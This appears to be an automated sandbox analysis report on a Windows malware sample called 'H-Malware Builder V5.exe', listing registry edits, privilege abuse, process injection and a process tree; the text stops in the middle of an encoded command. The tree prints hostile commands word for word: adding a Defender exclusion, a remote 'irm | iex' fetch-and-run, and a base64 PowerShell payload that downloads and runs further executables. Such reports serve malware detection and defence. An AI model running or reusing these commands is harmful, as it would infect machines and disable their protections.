Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 50003100000000004759a64a10004c6f63616c003c0009000400efbe475988488459e73d2e0000007ee101000000010000000000000000000000000000009f30f1004c006f00630061006c00000014000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 500031000000000047590a55100041646d696e003c0009000400efbe475988488459e73d2e00000060e101000000010000000000000000000000000000007ae53200410064006d0069006e00000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 7800310000000000475988481100557365727300640009000400efbe874f77488459e73d2e000000c70500000000010000000000000000003a0000000000c85ad50055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\NodeSlot = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1652 SCHTASKS.exe 644 SCHTASKS.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3432 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3904 powershell.exe 3904 powershell.exe 1660 Stub.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 1180 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 1180 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 1180 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 1180 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 2684 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 2684 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 1180 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 2652 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 2652 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 1180 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 2652 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 1180 powershell.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe 4992 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3432 Explorer.EXE -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3432 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3904 powershell.exe Token: SeDebugPrivilege 1660 Stub.exe Token: SeDebugPrivilege 1660 Stub.exe Token: SeDebugPrivilege 4992 dllhost.exe Token: SeDebugPrivilege 1180 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeDebugPrivilege 2652 powershell.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3876 svchost.exe Token: SeCreatePagefilePrivilege 3876 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1532 svchost.exe Token: SeIncreaseQuotaPrivilege 1532 svchost.exe Token: SeSecurityPrivilege 1532 svchost.exe Token: SeTakeOwnershipPrivilege 1532 svchost.exe Token: SeLoadDriverPrivilege 1532 svchost.exe Token: SeBackupPrivilege 1532 svchost.exe Token: SeRestorePrivilege 1532 svchost.exe Token: SeShutdownPrivilege 1532 svchost.exe Token: SeSystemEnvironmentPrivilege 1532 svchost.exe Token: SeManageVolumePrivilege 1532 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1532 svchost.exe Token: SeIncreaseQuotaPrivilege 1532 svchost.exe Token: SeSecurityPrivilege 1532 svchost.exe Token: SeTakeOwnershipPrivilege 1532 svchost.exe Token: SeLoadDriverPrivilege 1532 svchost.exe Token: SeSystemtimePrivilege 1532 svchost.exe Token: SeBackupPrivilege 1532 svchost.exe Token: SeRestorePrivilege 1532 svchost.exe Token: SeShutdownPrivilege 1532 svchost.exe Token: SeSystemEnvironmentPrivilege 1532 svchost.exe Token: SeUndockPrivilege 1532 svchost.exe Token: SeManageVolumePrivilege 1532 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1532 svchost.exe Token: SeIncreaseQuotaPrivilege 1532 svchost.exe Token: SeSecurityPrivilege 1532 svchost.exe Token: SeTakeOwnershipPrivilege 1532 svchost.exe Token: SeLoadDriverPrivilege 1532 svchost.exe Token: SeSystemtimePrivilege 1532 svchost.exe Token: SeBackupPrivilege 1532 svchost.exe Token: SeRestorePrivilege 1532 svchost.exe Token: SeShutdownPrivilege 1532 svchost.exe Token: SeSystemEnvironmentPrivilege 1532 svchost.exe Token: SeUndockPrivilege 1532 svchost.exe Token: SeManageVolumePrivilege 1532 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1532 svchost.exe Token: SeIncreaseQuotaPrivilege 1532 svchost.exe Token: SeSecurityPrivilege 1532 svchost.exe Token: SeTakeOwnershipPrivilege 1532 svchost.exe Token: SeLoadDriverPrivilege 1532 svchost.exe Token: SeSystemtimePrivilege 1532 svchost.exe Token: SeBackupPrivilege 1532 svchost.exe Token: SeRestorePrivilege 1532 svchost.exe Token: SeShutdownPrivilege 1532 svchost.exe Token: SeSystemEnvironmentPrivilege 1532 svchost.exe Token: SeUndockPrivilege 1532 svchost.exe Token: SeManageVolumePrivilege 1532 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1532 svchost.exe Token: SeIncreaseQuotaPrivilege 1532 svchost.exe Token: SeSecurityPrivilege 1532 svchost.exe Token: SeTakeOwnershipPrivilege 1532 svchost.exe Token: SeLoadDriverPrivilege 1532 svchost.exe -
Suspicious use of SetWindowsHookEx 47 IoCs
pid Process 2380 Conhost.exe 5036 Conhost.exe 3788 Conhost.exe 3976 Conhost.exe 2380 Conhost.exe 2912 Conhost.exe 1728 Conhost.exe 4712 Conhost.exe 3372 Conhost.exe 3960 Conhost.exe 1404 Conhost.exe 1980 Conhost.exe 2132 Conhost.exe 2428 Conhost.exe 1876 Conhost.exe 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 1184 Conhost.exe 2284 Conhost.exe 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 1592 Conhost.exe 3432 Explorer.EXE 3432 Explorer.EXE 3444 Conhost.exe 4680 Conhost.exe 3432 Explorer.EXE 3432 Explorer.EXE 804 Conhost.exe 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 460 Conhost.exe 3432 Explorer.EXE 3788 Conhost.exe 3432 Explorer.EXE 3652 Conhost.exe 3432 Explorer.EXE 3432 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1060 wrote to memory of 3904 1060 H-Malware Builder V5.exe 83 PID 1060 wrote to memory of 3904 1060 H-Malware Builder V5.exe 83 PID 1060 wrote to memory of 1660 1060 H-Malware Builder V5.exe 87 PID 1060 wrote to memory of 1660 1060 H-Malware Builder V5.exe 87 PID 1060 wrote to memory of 116 1060 H-Malware Builder V5.exe 88 PID 1060 wrote to memory of 116 1060 H-Malware Builder V5.exe 88 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 1660 wrote to memory of 4992 1660 Stub.exe 89 PID 4992 wrote to memory of 608 4992 dllhost.exe 5 PID 4992 wrote to memory of 668 4992 dllhost.exe 7 PID 4992 wrote to memory of 944 4992 dllhost.exe 12 PID 4992 wrote to memory of 64 4992 dllhost.exe 13 PID 4992 wrote to memory of 388 4992 dllhost.exe 14 PID 4992 wrote to memory of 512 4992 dllhost.exe 15 PID 4992 wrote to memory of 1080 4992 dllhost.exe 17 PID 4992 wrote to memory of 1096 4992 dllhost.exe 18 PID 4992 wrote to memory of 1136 4992 dllhost.exe 19 PID 4992 wrote to memory of 1152 4992 dllhost.exe 20 PID 4992 wrote to memory of 1272 4992 dllhost.exe 21 PID 4992 wrote to memory of 1292 4992 dllhost.exe 22 PID 4992 wrote to memory of 1328 4992 dllhost.exe 23 PID 4992 wrote to memory of 1368 4992 dllhost.exe 24 PID 4992 wrote to memory of 1440 4992 dllhost.exe 25 PID 4992 wrote to memory of 1572 4992 dllhost.exe 26 PID 4992 wrote to memory of 1604 4992 dllhost.exe 27 PID 4992 wrote to memory of 1628 4992 dllhost.exe 28 PID 4992 wrote to memory of 1720 4992 dllhost.exe 29 PID 4992 wrote to memory of 1740 4992 dllhost.exe 30 PID 4992 wrote to memory of 1784 4992 dllhost.exe 31 PID 4992 wrote to memory of 1852 4992 dllhost.exe 32 PID 4992 wrote to memory of 1932 4992 dllhost.exe 33 PID 4992 wrote to memory of 1940 4992 dllhost.exe 34 PID 4992 wrote to memory of 1520 4992 dllhost.exe 35 PID 4992 wrote to memory of 1432 4992 dllhost.exe 36 PID 4992 wrote to memory of 1532 4992 dllhost.exe 37 PID 4992 wrote to memory of 2100 4992 dllhost.exe 38 PID 4992 wrote to memory of 2196 4992 dllhost.exe 40 PID 4992 wrote to memory of 2372 4992 dllhost.exe 41 PID 4992 wrote to memory of 2496 4992 dllhost.exe 42 PID 4992 wrote to memory of 2504 4992 dllhost.exe 43 PID 4992 wrote to memory of 2668 4992 dllhost.exe 45 PID 4992 wrote to memory of 2716 4992 dllhost.exe 46 PID 4992 wrote to memory of 2736 4992 dllhost.exe 47 PID 4992 wrote to memory of 2744 4992 dllhost.exe 48 PID 4992 wrote to memory of 2776 4992 dllhost.exe 49 PID 4992 wrote to memory of 2832 4992 dllhost.exe 50 PID 4992 wrote to memory of 2888 4992 dllhost.exe 51 PID 4992 wrote to memory of 3004 4992 dllhost.exe 52 PID 4992 wrote to memory of 2232 4992 dllhost.exe 53 PID 4992 wrote to memory of 664 4992 dllhost.exe 54 PID 4992 wrote to memory of 3312 4992 dllhost.exe 55 PID 4992 wrote to memory of 3432 4992 dllhost.exe 56 PID 4992 wrote to memory of 3528 4992 dllhost.exe 57 PID 4992 wrote to memory of 3724 4992 dllhost.exe 58 PID 4992 wrote to memory of 3880 4992 dllhost.exe 60 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:608
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:64
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5fc2a03c-bd98-4a7d-8d93-3d6b250e2228}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4992
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Drops file in System32 directory
PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:388
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1152 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2232
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1440
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2832
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2100
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2196
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2668
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2888
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3312
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"4⤵PID:1568
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "irm pastie.io/raw/fgaazw | iex"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAG